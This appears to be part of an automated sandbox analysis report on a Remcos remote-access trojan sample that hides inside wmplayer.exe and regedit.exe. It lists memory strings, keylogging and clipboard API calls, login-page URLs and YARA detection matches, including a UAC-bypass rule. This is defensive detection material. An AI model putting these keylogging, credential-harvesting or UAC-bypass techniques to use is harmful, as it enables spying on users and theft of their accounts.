                    Source: wmplayer.exe, 0000000D.00000003.2208934536.00000000035CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: wmplayer.exe, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: wmplayer.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: wmplayer.exe, 00000006.00000002.4570535787.00000000056B0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: wmplayer.exe, 00000006.00000002.4570535787.00000000056B0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                    Source: wmplayer.exe, 00000006.00000003.2182089097.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                    Source: wmplayer.exe, 00000006.00000003.2210276117.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp&V
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, regedit.exe, 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp=M
                    Source: wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpGM
                    Source: wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpQM
                    Source: wmplayer.exe, 00000006.00000003.2182089097.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                    Source: wmplayer.exe, 00000006.00000003.2182089097.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568652617.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2210276117.0000000000DD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl;
                    Source: wmplayer.exe, 00000006.00000003.2182089097.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpy
                    Source: wmplayer.exe, 00000006.00000003.2182089097.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/p
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0:
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0H
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0I
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://ocsp.msocsp.com0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://ocsp.msocsp.com0S
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://ocspx.digicert.com0E
                    Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://www.digicert.com/CPS0~
                    Source: wmplayer.exe, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: wmplayer.exe, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wmplayer.exe, 0000000F.00000002.2194687494.00000000006BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: wmplayer.exe, 0000000F.00000002.2194687494.00000000006BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
                    Source: wmplayer.exe, 00000006.00000002.4568924546.0000000004CF0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: wmplayer.exe, 00000006.00000002.4568924546.0000000004CF0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696428304750
                    Source: wmplayer.exe, 0000000D.00000002.2210606023.0000000000D24000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?77686a33b2eafa1538ef78c3be5a5910
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?caa2cf97cacae25a18f577703684ee65
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7e9591e308dbda599df1fc08720a72a3
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?c6a2869c584d2ea23c67c44abe1ec326
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: wmplayer.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-04-14-10-35/PreSignInSettingsConfig.json
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=4954a0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                    Source: wmplayer.exe, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: wmplayer.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://www.office.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000006_2_004099E4
                    Installs a global keyboard hook
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\Windows Media Player\wmplayer.exeJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_004159C6
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_004159C6
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040987A
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_00406DFC
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_00406E9F
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004068B5
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_004072B5
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_004159C6
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,6_2_00409B10
                    Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: regedit.exe PID: 1900, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.4568587228.0000000000D6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: regedit.exe PID: 1900, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041BB77 SystemParametersInfoW,6_2_0041BB77

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
